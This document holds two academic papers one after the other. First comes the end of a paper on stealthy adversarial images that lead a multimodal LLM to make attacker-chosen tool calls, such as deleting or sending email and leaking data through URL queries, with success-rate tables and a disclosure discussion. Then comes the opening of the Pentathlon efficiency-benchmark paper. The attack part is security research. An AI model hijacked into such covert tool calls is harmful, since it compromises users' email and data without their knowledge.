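    # SSIM over RGB images scaled to [0, 1]; scores >= 0.9 are treated as
    # visually indistinguishable in the paper.
    return ssim(clean, adversarial, channel_axis=-1, data_range=1.0)

def utility_metric_auc(scores, human_labels, lower_is_better=False) -> float:
    # AUC-ROC of an automated response-utility metric against binary human
    # preference labels; Loss and Selection are negated since lower is better.
    scores = [-s for s in scores] if lower_is_better else list(scores)
    return roc_auc_score(human_labels, scores)
```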
A possible concern is whether the averaged response utility metric would be misleading -- is it possible that the responses are less likely to be reasonable when the adversarial image successfully triggers a correct tool invocation? We verified that this is not the case in Appendix A.8. ### Experiment Results **The attack is successful, stealthy, and generalizable.** In Table 4 we evaluate our attack method on different attack variants, different images and on the unseen in-domain test set. For the three easier attack variants delete_email, send_email, send_email_hard, the success rate is close \begin{table} \begin{tabular}{l|c c c c c c} \hline \hline \multirow{2}{*}{Resposes} & \multirow{2}{*}{Human\(\uparrow\)} & \multirow{2}{*}{Loss \(\downarrow\)} & \multirow{2}{*}{Selection \(\downarrow\)} & \multirow{2}{*}{BLEU \(\uparrow\)} & \multicolumn{2}{c}{Rouge} \\ & & & & & 1 \(\uparrow\) & 2 \(\uparrow\) & L \(\uparrow\) \\ \hline \multicolumn{6}{c}{_image-related_} \\ \hline w/o attack & 48 & 1.00 & 23 & 84 & 93 & 90 & 92 \\ w/ attack & 37 & 1.20 & 83 & 38 & 65 & 49 & 58 \\ \multicolumn{6}{c}{_image-unrelated_} \\ \hline w/o attack & 86 & 0.71 & 24 & 72 & 82 & 73 & 77 \\ w/ attack & 77 & 0.84 & 69 & 34 & 56 & 38 & 45 \\ \hline \hline \end{tabular} \end{table} Table 2: Evaluation of response utility on responses generated with and without attack present respectively given both image-related or image-unrelated prompts. Observe a drop of only 10% human preference scores with and without attack. \begin{table} \begin{tabular}{|c|c c|} \hline Metric & related & unrelated \\ \hline Loss & 72 & 77 \\ Selection & 50 & 59 \\ BLEU & 61 & 64 \\ Rouge-1 & 60 & 59 \\ Rouge-2 & 60 & 61 \\ Rouge-L & 61 & 58 \\ \hline \end{tabular} \end{table} Table 3: AUC ROC scores for various automated metrics predicting human preference for response utility. to 100% on the image-related set, while slightly lower on the image-unrelated set. For all attack variants, the SSIM score is close to 100%, and the Loss metric shows around 10% less preference than clean model generations, aligned with what we've seen in Table 2. Even though the success rates for the latter two more challenging attacks are relatively lower, it is fine because as long as the attack remains stealthy, it will take effect and harm users after it is spread to enough victims. **The attack is also generalizable to out-domain samples.** In Table 5 we evaluate on the unseen, out-domain samples from the out-domain test set, using the same adversarial images in Table 4. The results indicate that the attacked images transfer almost equally well to out-domain examples. We also experimentally verified that (1) the response utility controlling variable \(\lambda_{r}\) improves the response utility and (2) we can sacrifice image stealthiness to make the attack more likely to be successful for hard attack variants in Appendix A.7. These bring more flexibility and customizability to the attack according to different use cases. ## 5 Discussion & Conclusion In this paper, we propose a novel attack against multimodal LLMs integrated with third-party tools. Adversarial images crafted in our attack are capable of manipulating the victim LLM to generate attacker-specified tool invocations following complex non-natural-language syntax and thus can harm the confidentiality and integrity of users' resources. 
In addition, these adversarial images generalize to broad user-LLM conversations and are highly stealthy since they look benign and do not affect a natural and reasonable user-LLM conversation. However, our attack has the limitation of being white-box _i.e.,_ requiring access to the model parameters, and does not apply to closed-source LLMs. Also, the attack currently only shows proof \begin{table} \begin{tabular}{l c|c c c c c c c} \hline \hline \multirow{2}{*}{Attack Variant} & \multirow{2}{*}{Image} & \multirow{2}{*}{SSIM} & \multicolumn{3}{c}{In-domain Related} & \multicolumn{3}{c}{In-domain Unrelated} \\ & & & Syntax & Exact & Loss & Syntax & Exact & Loss \\ \hline \multirow{3}{*}{delete\_email} & **\#1** & 0.91 & 98 & 98 & 1.09 & 78 & 78 & 0.8 \\ & **\#2** & 0.92 & 90 & 90 & 1.11 & 55 & 55 & 0.82 \\ & **\#3** & 0.87 & 92 & 92 & 1.11 & 73 & 73 & 0.78 \\ \hline \multirow{3}{*}{send\_email} & **\#4** & 0.90 & 98 & 98 & 1.08 & 69 & 69 & 0.77 \\ & **\#5** & 0.93 & 92 & 92 & 1.18 & 61 & 58 & 0.88 \\ & **\#6** & 0.92 & 100 & 100 & 1.04 & 69 & 69 & 0.78 \\ \hline \multirow{3}{*}{send\_email\_hard} & **\#6** & 0.91 & 100 & 100 & 1.14 & 61 & 56 & 0.86 \\ & **\#7** & 0.91 & 100 & 68 & 1.08 & 48 & 31 & 0.87 \\ & **\#8** & 0.88 & 86 & 0 & 1.19 & 31 & 0 & 0.78 \\ \hline \multirow{3}{*}{book\_ticket} & **\#8** & 0.90 & 22 & 20 & 1.51 & 9 & 8 & 0.97 \\ & **\#9** & 0.94 & 0 & 0 & 1.23 & 0 & 0 & 0.82 \\ & **\#9** & 0.91 & 46 & 44 & 1.3 & 9 & 9 & 1.07 \\ \hline \multirow{3}{*}{md\_url\_query} & **\#1** & 0.89 & 34 & 2 & 1.26 & 23 & 6 & 0.99 \\ & **\#1** & 0.89 & 0 & 0 & 1.09 & 0 & 0 & 0.71 \\ & **\#1** & 0.91 & 32 & 10 & 1.02 & 27 & 8 & 0.77 \\ \hline \hline \end{tabular} \end{table} Table 4: Evaluation of our attack on image stealthiness (SSIM), attack success rate (Syntax/Exact %), and response utility (Loss) on the in-domain test set for image-related and -unrelated prompts. \begin{table} \begin{tabular}{l c|c c c c c c} \hline \hline \multirow{2}{*}{Attack Variant} & \multirow{2}{*}{Image} & \multirow{2}{*}{SSIM} & \multicolumn{3}{c}{Out-domain Related} & \multicolumn{3}{c}{Out-domain Unrelated} \\ & & & Syntax & Exact & Loss & Syntax & Exact & Loss \\ \hline \multirow{3}{*}{delete\_email} & **\#1** & 0.91 & 98 & 98 & 1.18 & 66 & 66 & 0.58 \\ & **\#2** & 0.92 & 62 & 62 & 0.98 & 54 & 54 & 0.76 \\ & **\#3** & 0.87 & 92 & 92 & 0.83 & 68 & 68 & 0.58 \\ \hline \multirow{3}{*}{send\_email} & **\#1** & 0.90 & 100 & 100 & 1.18 & 62 & 62 & 0.6 \\ & **\#2** & 0.93 & 66 & 66 & 1.14 & 50 & 48 & 0.68 \\ & **\#1** & 0.92 & 98 & 98 & 0.84 & 80 & 80 & 0.64 \\ \hline \multirow{3}{*}{send\_email\_hard} & **\#1** & 0.91 & 96 & 96 & 1.27 & 56 & 50 & 0.69 \\ & **\#2** & 0.91 & 86 & 80 & 1.0 & 28 & 20 & 0.78 \\ \cline{1-1} & **\#2** & 0.88 & 60 & 0 & 0.9 & 40 & 0 & 0.66 \\ \hline \hline \end{tabular} \end{table} Table 5: Evaluation of the trained attack from Table 4 on out-domain test set. We pick only the three easier attack types as they are mostly successful in the in-domain setting. of validity on a single multimodal LLM, but not for all such models. Along this line, it would be interesting to explore black-box transferability to other multimodal LLMs. The attack and methodology described in this paper may be utilized in a malicious way by real-world attackers. Despite the risk involved, we believe it's crucial to disclose such risks of multimodal LLMs in full before more open-weight multimodal LLMs integrated with tools are adopted in production. 
We will publish the entire codebase and all adversarial images used in this paper, as a complement to the appendices. We also suggest that strict authorization should be enforced on LLMs' access to third-party tools as a bottom-line defense for now. ### Acknowledgement We thank the local volunteers who helped us with human annotations and in-domain test set creation.
2307.09701
Efficiency Pentathlon: A Standardized Arena for Efficiency Evaluation
Rising computational demands of modern natural language processing (NLP) systems have increased the barrier to entry for cutting-edge research while posing serious environmental concerns. Yet, progress on model efficiency has been impeded by practical challenges in model evaluation and comparison. For example, hardware is challenging to control due to disparate levels of accessibility across different institutions. Moreover, improvements in metrics such as FLOPs often fail to translate to progress in real-world applications. In response, we introduce Pentathlon, a benchmark for holistic and realistic evaluation of model efficiency. Pentathlon focuses on inference, which accounts for a majority of the compute in a model's lifecycle. It offers a strictly-controlled hardware platform, and is designed to mirror real-world applications scenarios. It incorporates a suite of metrics that target different aspects of efficiency, including latency, throughput, memory overhead, and energy consumption. Pentathlon also comes with a software library that can be seamlessly integrated into any codebase and enable evaluation. As a standardized and centralized evaluation platform, Pentathlon can drastically reduce the workload to make fair and reproducible efficiency comparisons. While initially focused on natural language processing (NLP) models, Pentathlon is designed to allow flexible extension to other fields. We envision Pentathlon will stimulate algorithmic innovations in building efficient models, and foster an increased awareness of the social and environmental implications in the development of future-generation NLP models.
Hao Peng, Qingqing Cao, Jesse Dodge, Matthew E. Peters, Jared Fernandez, Tom Sherborne, Kyle Lo, Sam Skjonsberg, Emma Strubell, Darrell Plessas, Iz Beltagy, Evan Pete Walsh, Noah A. Smith, Hannaneh Hajishirzi
2023-07-19T01:05:33Z
http://arxiv.org/abs/2307.09701v1
# Efficiency Pentathlon: ###### Abstract Rising computational demands of modern natural language processing (NLP) systems have increased the barrier to entry for cutting-edge research while posing serious environmental concerns. Yet, progress on model efficiency has been impeded by practical challenges in model evaluation and comparison. For example, hardware is challenging to control due to disparate levels of accessibility across different institutions. Moreover, improvements in metrics such as FLOPs often fail to translate to progress in real-world applications. In response, we introduce efficiency Pentathlon, a benchmark for holistic and realistic evaluation of model efficiency. Pentathlon focuses on inference, which accounts for a majority of the compute in a model's lifecycle. It offers a strictly-controlled hardware platform, and is designed to mirror real-world applications scenarios. It incorporates a suite of metrics that target different aspects of efficiency, including latency, throughput, memory overhead, number of parameters, and energy consumption, hence the name **Pentathlon**. It also comes with a software library that can be seamlessly integrated into any codebase and enable evaluation. As a standardized and centralized evaluation platform, Pentathlon can drastically reduce the workload to make fair and reproducible efficiency comparisons. While initially focused on natural language processing (NLP) models, Pentathlon is designed to allow flexible extension to other fields. We envision Pentathlon will stimulate algorithmic innovations in building efficient models, and foster an increased awareness of the social and environmental implications in the development of future-generation NLP models. ## 1 Introduction The remarkable recent progress in artificial intelligence owes much to advances in large-scale deep learning models (Brown et al., 2020; Chowdhery et al., 2022; Thoppilan et al., 2022, _inter alia_). However, their rapidly-increasing computational demands have introduced substantial challenges. The barrier to entry to cutting-edge research is raised, particularly impacting researchers and practitioners with fewer resources and exacerbating disparities in the AI research landscape. Moreover, the escalating energy consumption associated with these computation-intensive models leads to serious environmental concerns (Lacoste et al., 2019; Schwartz et al., 2020; Henderson et al., 2020; Strubell et al., 2020, _inter alia_). Therefore, building more efficient models for AI systems has become a pressing challenge, drawing widespread attention from the community (Reddi et al., 2020; Tay et al., 2020; Treviso et al., 2022; Liu et al., 2022; Yao et al., 2022; Fu et al., 2023, _inter alia_). However, a lack of standardized evaluation protocols makes it challenging to measure the progress in efficiency improvements and obstructs the efforts in developing more efficient models. In many cases, models are evaluated in scenarios that hardly reflect the deployment of machine learning models in practice (Henderson et al., 2020). Moreover, some widely-adopted efficiency metrics such as FLOPs often poorly correlate with models' real-world efficiency performance (Dehghani et al., 2022; Fernandez et al., 2023). The issue is exacerbated by several practical challenges. For instance, hardware is a critical confounding factor in efficiency comparisons, but is very challenging to control in practice, due to disparate levels of hardware accessibility across institutions. 
Consequently, this leads to a disconnect between efficiency improvements in research and tangible progress in practice. There is a pressing need for a standardized efficiency evaluation framework. To address these challenges, we present Pentathlon. It is designed to establish a standardized platform for evaluating the _inference_ efficiency of AI models. As shown by Patterson et al. (2022) and Wu et al. (2022), inference accounts for over 60% of energy consumption in real-world machine learning workloads. Pentathlon aims to provide comprehensive and realistic evaluation of efficiency, and offer the community a platform to make fair comparisons in a strictly controlled environment. To achieve this, Pentathlon adopts the following design choices: * **Controlled hardware environment** (§2.1): hosted on a dedicated server, Pentathlon provides a centralized platform with a strictly controlled hardware environment. This removes the necessity for practitioners to reproduce previous works on their own hardware for fair comparisons, and allows easy comparisons with models previously evaluated on Pentathlon using identical hardware. Moreover, it allows us to use power monitoring devices to accurately measure the energy consumption during models' inference, which was previously impossible. * **Realistic scenarios** (§2.2): Pentathlon evaluates models under various scenarios specifically designed to mirror real-world deployment contexts, allowing different approaches to batching input instances, aiming to bridge the gap between research settings and practical applications. * **Comprehensive metrics** (§2.3): Pentathlon evaluates models with five crucial metrics: throughput, latency, memory overhead, the number of parameters, and energy consumption, hence the name **Pentathlon**. This provides a more holistic understanding of a model's efficiency. * **Flexibility** (§2.4): Pentathlon is flexible by design and can be seamlessly integrated into any codebase. Although we focus on natural language processing (NLP) models in this paper, Pentathlon can be easily extended to other fields. Pentathlon is ready to accept submissions, helping to reduce the workload of conducting fair efficiency comparisons: [https://github.com/allenai/efficiency-pentathlon](https://github.com/allenai/efficiency-pentathlon). As we demonstrate in the experiments (§3), Pentathlon can provide fresh insights into existing models. Through our comparisons of several established machine translation models, the comprehensive evaluation offered by Pentathlon highlights the particular effectiveness of quantization in large models. Furthermore, Pentathlon's energy evaluation component reveals new perspectives on the models' energy consumption during inference. We envision that by offering standardized efficiency evaluation, Pentathlon will stimulate the development of more efficient models, foster a deeper awareness of the computational costs of AI research, and accelerate progress on reducing them. Figure 1: By submitting to Pentathlon, practitioners can compare their models against all previous submissions on identical hardware, eliminating the need to re-implement previous works and substantially reducing the workload for fair efficiency comparisons. Models are evaluated in four realistic scenarios designed to mirror real-world applications. 
Our platform evaluates each submission across five crucial efficiency metrics: throughput, latency, memory overhead, the number of parameters, and energy consumption. ## 2 Efficiency Pentathlon This section discusses the current challenges in efficiency evaluation and outlines the design choices we adopted in Pentathlon to effectively address them. ### Controlling the Hardware for Fair Efficiency Comparisons The hardware stands as a critical confounding factor when comparing efficiency, and can significantly influence the conclusions of such comparisons. As demonstrated by several recent studies, the trends in efficiency comparisons can vary substantially when different accelerators are used (Peng et al., 2021; Kasai et al., 2021; Wu et al., 2022; Wang et al., 2020, _inter alia_). Compounding this issue is the practical difficulty in controlling for hardware, primarily because access to hardware platforms often varies among institutions. This is a major obstacle to fair efficiency comparisons. Even with publicly available implementations, practitioners often need to adapt them to their own hardware environments to ensure fair comparisons. **Our approach.** Pentathlon aims to stimulate algorithmic innovations that can generalize across different hardware. Therefore, we control for hardware while conducting efficiency comparisons and offer a varied selection of hardware to simulate different use cases. Pentathlon is hosted on a dedicated in-house server. Participants can submit their models' code and checkpoints to our server through an easy-to-use tool that we provide (§2.4). This ensures that all models evaluated using Pentathlon use an identical hardware environment, guaranteeing fair comparisons. By requiring code submission, Pentathlon helps improve transparency. The specific implementation choices for each submission, such as data IO and padding, will be thoroughly documented. This is appealing because it helps disentangle the efficiency gains due to _algorithmic innovations_ from those achieved by better implementations that can equally benefit all models. Further, a dedicated in-house server allows us to measure energy consumption, which would otherwise be very challenging to incorporate (§2.3). The hosting machine of Pentathlon has two NVIDIA RTX 8000 GPUs, two Intel Xeon Ice Lake Gold 6348 28-Core CPUs, and 1TB DDR4 memory. It supports evaluation using both GPUs and CPUs, or CPUs only. We plan to extend Pentathlon to offer a broader selection of hardware in the near future.2 Footnote 2: We plan to use the NVIDIA Jetson TX2 Module ([https://developer.nvidia.com/embedded/jetson-tx2](https://developer.nvidia.com/embedded/jetson-tx2)) to simulate limited-resource settings such as on an automobile, and extend Pentathlon to a smartphone to evaluate machine learning models designed to run on mobile devices. To accurately measure each submission's efficiency without interference, we have implemented a scheduler on the server. This ensures that only one inference workload is running at any given time. In Pentathlon, the efficiency measurement begins when the model has been loaded and is ready for predictions, excluding the overhead associated with both model and data loading. 
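This scheduling constraint can be pictured with a small sketch. The file-lock mechanism and the entry-point names below are illustrative assumptions rather than a description of the actual scheduler.

```python
import contextlib
import fcntl

@contextlib.contextmanager
def exclusive_inference_slot(lock_path="/tmp/pentathlon.lock"):
    """Hold an OS-level lock so that at most one inference workload runs on the
    shared hardware at any given time (a Unix-only sketch of the idea)."""
    with open(lock_path, "w") as handle:
        fcntl.flock(handle, fcntl.LOCK_EX)   # blocks until the previous run finishes
        try:
            yield
        finally:
            fcntl.flock(handle, fcntl.LOCK_UN)

# with exclusive_inference_slot():
#     model = load_model()      # hypothetical; excluded from the measurement window
#     start_measurement()       # timing and energy begin only once the model is ready
#     run_submission(model)     # hypothetical evaluation entry point
```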
### Realistic Evaluation Scenarios Designed to Emulate Real-world Applications \begin{table} \begin{tabular}{l c c c c c c} \hline \hline **Scenarios** & **Acc.** & **TP.** & **Latency** & **Mem.** & **Energy \& CO\({}_{2}\)** & **BSZ** & **Online** \\ \hline **Fixed batching** & ✓ & ✓ & ✓ & ✓ & ✓ & User specified & ✓ \\ **Poisson batching** & ✗ & ✓ & ✓ & ✓ & ✓ & Random & ✓ \\ **Single stream** & ✗ & ✗ & ✓ & ✓ & ✓ & 1 & ✓ \\ **Offline** & ✗ & ✓ & ✗ & ✓ & ✓ & User specified & ✗ \\ \hline \hline \end{tabular} \end{table} Table 1: Four evaluation scenarios and the metrics they focus on. Acc.: accuracy, TP.: throughput, Mem.: memory. In the three online scenarios, Pentathlon interfaces with the submitted model via standard input/output (stdio), providing inputs and capturing outputs in real-time. Rearrangement of instance order is prohibited in these scenarios. In the offline scenario, the model is given immediate access to all evaluation instances via a file, enabling techniques such as sorting by lengths. typically assessed with a fixed batch size. Such disparity underscores the pressing need for evaluation protocols that better reflect real-world deployments. **Our approach.** Inspired by Reddi et al. (2020), we include four distinct evaluation scenarios to provide a comprehensive evaluation of NLP models in a variety of realistic settings: * **Fixed batching.** The evaluation data is first randomly shuffled before being grouped into batches of a user-specified batch-size. This setting is intended to mimic typical research experimental settings. We defer to the users choosing optimal batch sizes for their models. * **Poisson batching** is similar to the fixed batching scenario, but the size of each batch is randomly drawn from a Poisson distribution with a mean of batch-size: batch-size\({}_{\text{Pois}}\sim\text{Pois}(\text{batch-size})\). This setup aims to simulate an online service where the volume of requests is unpredictable but the average can be estimated. * **Single stream** randomly shuffles the evaluation instances and uses a batch size of one, reflecting the applications processing one request at a time. * **Offline:** In this scenario, the model has immediate access to the entire evaluation dataset, enabling techniques such as sorting the inputs by length or adaptive batching to enhance throughput and memory efficiency. This scenario reflects large-scale, offline tasks. These varied evaluation scenarios are designed to highlight the strengths and weaknesses of different models in diverse deployment contexts. ### A Diverse Set of Metrics for Comprehensive Efficiency Evaluation AI systems' efficiency in practical contexts is multifaceted and can hardly be adequately represented by any single metric. Different use cases prioritize different efficiency aspects. For example, a model deployed on mobile devices prioritizes energy efficiency, an offline model requires optimal throughput, while an online service model demands low latency. However, the widely-used metrics often fail to show strong correlations with these diverse practical aspects of efficiency. Take, for instance, the number of floating point number operations (FLOPs) a model takes for performing a workload. It has become a standard efficiency metric partly due to its hardware and implementation-agnostic nature, highlighting the algorithmic advancements in model efficiency (Schwartz et al., 2020). 
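For orientation, FLOPs for a Transformer forward pass are often estimated with a simple parameter-and-token rule of thumb; the helper below is a sketch of that convention, supplied here only for illustration and not part of Pentathlon's methodology.

```python
def approx_forward_flops(num_parameters: float, num_tokens: int) -> float:
    """Rough, hardware-agnostic FLOPs estimate for one Transformer forward pass:
    about 2 * parameters * tokens (ignores the attention term, which grows
    quadratically in sequence length)."""
    return 2.0 * num_parameters * num_tokens

# e.g., a 610M-parameter model processing a 30-token input:
# approx_forward_flops(610e6, 30) -> roughly 3.7e10 FLOPs
```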
Yet recent research has cast doubt on its relevance, showing that it is a poor indicator of many practical metrics including throughput, latency, and energy consumption (Henderson et al., 2020). Even for models sharing similar architectures and numbers of parameters, their energy efficiency can diverge significantly under identical workloads, partly due to the specific deep learning operations they are implemented with (Cao et al., 2021). This highlights the limitations of conventional evaluation protocols, which risk oversimplifying efficiency comparisons by attempting to encapsulate performance in a single measure. Instead, we propose a more comprehensive approach that considers a diverse suite of metrics, which more accurately reflects the multifaceted nature of efficiency in AI models. **Our approach.** Our benchmark's suite of evaluation metrics includes the following: * **Throughput** measures the volume of data a system can process in a unit of time. We measure throughput with instances/s; for tasks that require generating text, we also consider words/s. * **Latency**, in milliseconds. It quantifies the delay between the system receiving a user request and providing a response. Complementing throughput, it is especially critical in real-time applications, such as smartphone-based AI assistants. * **Memory overhead**, in GiB, provides insight into a system's applicability in low-resource settings, where available memory can be a bottleneck. In resource-abundant settings, lower memory overhead allows larger batch sizes during inference, improving metrics such as throughput. Our benchmark measures maximum CPU and GPU (if applicable) memory consumption. * **Energy consumption and carbon footprint.** The energy overhead of a system, measured in W-h, indicates its suitability for battery-powered devices. Combined with carbon intensity data, it can also assess a model's carbon footprint in terms of the amount of CO\({}_{2}\) emissions, providing an environmental impact comparison for models deployed in practice. We provide more details about measuring energy consumption in §2.3.1. * **Model size**, measured in the number of parameters, serves as an indicator of a model's storage overhead, and often correlates with its memory overhead. Our approach provides a holistic view of model efficiency, with each metric focusing on specific application contexts, allowing practitioners to select efficient methods suited to their applications. #### 2.3.1 Challenges in Measuring Energy and our Solution While most of the metrics above can be measured with existing tools, accurately measuring energy presents unique challenges, primarily due to the lack of established software for this purpose. Although CUDA offers toolkits to measure GPU power, the power usage of CPUs, DRAM, and disks is only accessible on specific types of hardware and requires root access (Khan et al., 2018). Many existing methods estimate energy consumption for _training_ using GPU energy alone (Luccioni et al., 2022; Liang et al., 2022). However, as we will demonstrate in the experiments, this approach is not suitable for our purposes for two primary reasons. First, it excludes energy comparisons of models running on CPUs, which our study aims to explore. Second, inference tasks by nature entail more frequent data IO interactions, imposing more significant workloads on CPUs, DRAM, disks, etc., compared to training. 
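Most of the non-energy metrics above can be instrumented directly around a submission's prediction call; the sketch below shows one way to record throughput, latency, and peak memory. It is illustrative only and is not Pentathlon's released library. Energy, in contrast, must account for the non-GPU components (CPUs, DRAM, disks) of the whole machine, as discussed next.

```python
import resource
import time
import torch

def profile_inference(predict, batches):
    """Throughput, mean latency, and peak memory for a user-supplied `predict`
    callable; measurement starts after the model has already been loaded."""
    if torch.cuda.is_available():
        torch.cuda.reset_peak_memory_stats()
    latencies_ms, n_instances = [], 0
    start = time.perf_counter()
    for batch in batches:
        t0 = time.perf_counter()
        predict(batch)
        latencies_ms.append(1000.0 * (time.perf_counter() - t0))   # ms per batch
        n_instances += len(batch)
    wall_s = time.perf_counter() - start
    return {
        "throughput_instances_per_s": n_instances / wall_s,
        "mean_latency_ms": sum(latencies_ms) / len(latencies_ms),
        # ru_maxrss is reported in KiB on Linux, hence the conversion to GiB.
        "peak_cpu_mem_gib": resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 2**20,
        "peak_gpu_mem_gib": (torch.cuda.max_memory_allocated() / 2**30
                             if torch.cuda.is_available() else 0.0),
    }
```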
In our experiments, they account for more than 60% of energy consumption--a significant increase compared to previous estimates for training (Dodge et al., 2022). Therefore, it is essential to measure not only GPU energy but the total energy consumed by the entire machine accurately. To this end, we use an energy-monitoring device to measure the power consumption.3 This data, in conjunction with the model's run time, can be used to calculate the model's energy consumption. Physically connected to the host machine's power cables, this device's sensors provide accurate real-time power usage data. According to the manufacturer, the error rate is \(\pm 1.2\%\). Footnote 3: We use an emonTx V4 for power consumption measurement: [https://shop.openenergymonitor.com/single-phase-6-channel-energy-monitoring-emontx-v4/](https://shop.openenergymonitor.com/single-phase-6-channel-energy-monitoring-emontx-v4/). The power consumption is calculated by subtracting the host machine's idling power from the meter reading during an inference run. To calculate the carbon emissions, we use the carbon intensity data provided by Schmidt et al. (2022) based on the geographical location and time of the day. ### Ensuring Flexibility in Pentathlon Requiring code and checkpoint submission imposes additional implementation effort from participants, a tradeoff we believe is worthwhile for achieving fair comparisons on a strictly-controlled hardware platform. Recognizing from past benchmark efforts that this might discourage practitioners from participating, we have made a concerted effort to ensure that Pentathlon can be easily integrated into existing code bases and to streamline the submission process.4 Footnote 4: This is a lesson that some of the authors learned from the NAACL2022 reproducibility track: [https://2022.naacl.org/blog/reproducibility-track/](https://2022.naacl.org/blog/reproducibility-track/) **Accommodating diverse software frameworks.** We aim to encourage wide participation and ensure our platform is accessible to practitioners accustomed to various software infrastructures. Therefore, Pentathlon makes no assumption about the submission's deep learning framework (if a deep learning model is used at all) or the programming language it's implemented in. We require that every submission: (1) Include a GitHub repository containing the code and listing dependencies (this repository does not need to be public); (2) Interface the model to read inputs from stdin and write outputs to stdout;5 (3) Implement the necessary tools to download the model checkpoint for evaluation. We provide detailed instructions and examples to guide practitioners through this process. Based on our internal testing, learning to integrate Pentathlon into an existing codebase and submitting it to our server for evaluation takes a participant less than one hour; and an onward submission takes a single command line. Furthermore, Pentathlon can serve as a standalone tool for preparing the submission and providing basic efficiency metrics. Footnote 5: We provide a Python tool for this stdio interaction. Users can implement their own interfaces if they decide to use other programming languages. In providing abstractions around the evaluation interface, we limit assumptions made around the underlying system implementation and allow for the installation of user dependencies as needed. This enables support for a diversity of backend frameworks and runtimes as the user is not constrained to a single deep learning framework or data format. 
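Requirement (2) above amounts to a very small serving loop. The sketch below illustrates the idea; the JSON-lines encoding and the `predict` callable are assumptions for illustration, and the provided Python tool handles the actual wire format, while submissions in other languages only need to reproduce the same read-from-stdin/write-to-stdout behavior.

```python
import json
import sys

def serve_stdio(predict):
    """Read one JSON-encoded instance per line from stdin and write one
    JSON-encoded prediction per line to stdout (a sketch of the interface
    requirement, not the official helper)."""
    for line in sys.stdin:
        line = line.strip()
        if not line:
            continue
        instance = json.loads(line)
        prediction = predict(instance)          # the model is loaded before serving starts
        sys.stdout.write(json.dumps(prediction) + "\n")
        sys.stdout.flush()                      # flush so the harness sees each output immediately

# if __name__ == "__main__":
#     model = load_model()                      # hypothetical; excluded from timing
#     serve_stdio(lambda inst: {"output": model(inst["input"])})
```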
For example, Pentathlon allows users to use both research frameworks (e.g., eager execution PyTorch and TensorFlow 2.0) as well as specialized inference runtimes (e.g., ONNX Runtime, TVM, and TensorRT). The additional flexibility provided by this format allows Pentathlon to remain accessible to researchers familiar with a particular framework, while also enabling the exploration of different means of increasing overall _end-to-end efficiency_ of the machine learning system that is available in deployment settings. This design allows users to evaluate efficiency gains from improving different aspects of the overall system, such as those obtained from optimizing the model architectures or from utilizing faster software frameworks. Pentathlon builds upon established software developed and maintained by AI2. These tools have been thoroughly tested by AI2 researchers and engineers, enhancing Pentathlon's robustness and ease of use. For example, empowered by Catwalk, Pentathlon supports a diverse set of NLP tasks, and allows Pentathlon to easily extend to many other tasks and research fields.6 Footnote 6: Catwalk provides a unified interface to a broad range of existing NLP tasks and models. A list of tasks that are currently supported by Pentathlon can be found at [https://github.com/allenai/catwalk](https://github.com/allenai/catwalk). ## 3 Experiments We use Pentathlon to benchmark several established models for machine translation and text classification with the RAFT dataset (Alex et al., 2021). In the interest of space, we refer the readers to the appendices for the RAFT experiments. Machine Translation.Improving the efficiency of machine translation (MT) and text generation models has gained significant momentum. A growing number of recent workshops and shared tasks have held dedicated efficiency tracks (Birch et al., 2018; Hayashi et al., 2019; Heafield et al., 2020; Akhbardeh et al., 2021; Kocmi et al., 2022, _inter alia_). Aligned with this goal, we seek to contribute to this ongoing effort. To this end, our initial experiments with Pentathlon focus on machine translation. Dataset and setting.We present results for WMT14 DE-EN (Bojar et al., 2014), a well-studied dataset that is selected as the testbed in the efficiency tracks of two recent WMT workshops (Akhbardeh et al., 2021; Kocmi et al., 2022). Pentathlon already supports many other MT and text generation datasets, and can be easily extended to more. We focus on DE->EN translation here; additional results with EN->DE are available in the Appendices. Balancing the inference wall clock time and accurately measuring the efficiency, we use different numbers of evaluating instances across the four scenarios. For WMT14 DE-EN: * **Fixed batching** uses the full test set of 3,002 instances. It also measures the translation quality using SacreBLEU (Post, 2018). * **Poisson batching** randomly draws 4,000 instances (with replacement) from the test set. * In the **single stream** scenario, 1,000 randomly selected test instances are used. * Differently from others, the **offline** scenario randomly selects 8,000 instances from the _training_ data.7 We ensure that the selected instances have an average length matching that of the test set. Footnote 7: In this scenario the models are granted immediate access to all instances and can sort them by length. If the instances _were_ drawn from the test set, this would result in the artifact that groups duplicates of the same instance in the same batch, which we aim to avoid. 
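The four scenarios described in §2.2 translate into batching logic along the following lines. The sketch is illustrative: the length-sorting heuristic for the offline scenario and the exact random draws are assumptions, not the benchmark's released implementation.

```python
import numpy as np

def make_batches(instances, scenario, batch_size=32, seed=0):
    """Group evaluation instances into batches under one of the four scenarios:
    'fixed', 'poisson', 'single_stream', or 'offline'."""
    rng = np.random.default_rng(seed)
    data = list(instances)
    if scenario == "offline":
        data.sort(key=len)                       # whole dataset visible up front: sort by length
    else:
        data = [data[i] for i in rng.permutation(len(data))]   # online scenarios: fixed random order

    batches, i = [], 0
    while i < len(data):
        if scenario == "single_stream":
            bsz = 1
        elif scenario == "poisson":
            bsz = max(1, int(rng.poisson(batch_size)))          # batch size ~ Pois(mean)
        else:  # "fixed" and "offline"
            bsz = batch_size
        batches.append(data[i:i + bsz])
        i += bsz
    return batches
```

Because the random generator is seeded, repeated calls reproduce the same instance order and the same Poisson batch sizes, which is how identical conditions across submissions can be guaranteed.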
Controlling for the random seed, all models are evaluated on the same set of instances in the same order, and with identical batch sizes in the Poisson batching scenario. Preliminary experiments indicate that the models' efficiency performance remains consistent across multiple runs. As such, we opt out of conducting multiple rounds of evaluation. All models are evaluated on one RTX8000 GPU, and the inference batch sizes for the fixed batching and offline scenarios are tuned to the allowable maximum for the available GPU hardware. Models.We benchmark the following publicly-available models covering a wide range of sizes: * **MBART**(Tang et al., 2021): a 610M-parameter-sized Transformer model for multilingual translation. It has two variants: many-to-one (MBART M2O), which translates other languages into English, and many-to-many (M2M), which can translate between multiple language pairs. We use the **MBART50** variant, originally pre-trained on monolingual corpora in 25 languages and then fine-tuned on parallel corpora across 50 languages for direct use as a translation engine. * **M2M100**(Fan et al., 2021): Transformer-based multilingual models for many-to-many translation. We report on two sizes with 418M and 1.2B parameters respectively. The **M2M100** model is trained using parallel corpora (e.g., WMT corpora described above) and mined bitext to enable translation between any two of 100 languages. * **OPUS**(Tiedemann and Thottingal, 2020): a bilingual Transformer model with 74M parameters for DE->EN translation. The model is trained on OPUS bitext corpora (Tiedemann, 2012). * **WMT19-Meta**(Ng et al., 2019): a DE->EN Transformer model with 314M parameters. This system won the WMT19 task on German to English news translation (Barrault et al., 2019). * **WMT21-Meta**(Tran et al., 2021): an M2O Transformer model with 4.7B parameters. Unlike 